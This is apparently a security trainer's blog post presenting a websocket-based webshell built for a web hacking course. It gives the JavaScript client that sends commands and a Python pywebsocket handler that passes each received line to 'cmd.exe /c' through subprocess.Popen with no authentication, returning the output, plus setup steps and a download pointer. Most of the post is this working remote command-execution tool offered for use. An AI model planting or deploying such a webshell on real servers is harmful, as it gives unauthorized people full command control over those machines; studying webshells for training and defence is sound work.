Simple websockets based webshell

I’m writing again after a year! It’s been an eventful one at that. Multiple conferences and two successful Xtreme Web Hacking trainings in that period.

As part of the XWH training that Akash and I did at nullcon 2015, I built an app to demo the functionality and usage of websockets. I went overboard and converted it into a full fledged web shell.

Websocket Client

The client is a simple connect and send call to a websockets server:


function WebSocketShell()
{
if ("WebSocket" in window)
{
var server = "serverip_or_hostname:9998/server"
var ws = new WebSocket("ws://" + server);

ws.onopen = function()
{
ws.send('ipconfig');
};

ws.onmessage = function (evt)
{
var received_msg = evt.data;
alert(received_msg);
};

ws.onclose = function(a)
{
alert('Error here');
};
}
else
{
alert("WebSocket NOT supported by your Browser!");
}
}

Websocket Server

The websockets server is a pywebsocket instance. The server side code is a python script that handles the incoming connection and the text.
The text is then passed to a subprocess.Popen call to be executed on the server. The output is collected and sent back to the client via the websocket.

def web_socket_transfer_data(request):
 while True:
  line = request.ws_stream.receive_message()
  if line is None:
   return
  if isinstance(line, unicode):
   proc = subprocess.Popen('cmd.exe /c ' + line, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
   out = proc.stdout.read() + proc.stderr.read()
   request.ws_stream.send_message(out, binary=False)
  else:
   request.ws_stream.send_message('Send plain text only!', binary=True)

Get it!

The code is available on Github: You can get it here

Usage

To run the server on port 9998 (default in the code, can be changed):

  1. Get pywebsocket
  2. Run python pywebsocket\mod_pywebsocket\standalone.py -p 9998 -w ws_server
  3. Open index.html in any browser that supports websockets. Latest Chrome/Firefox is good enough.
  4. Enter a (Windows) command like ipconfig
  5. Hit the Execute! button.
  6. Potato.
Happy Hacking!

Leave a Reply

Your email address will not be published. Required fields are marked *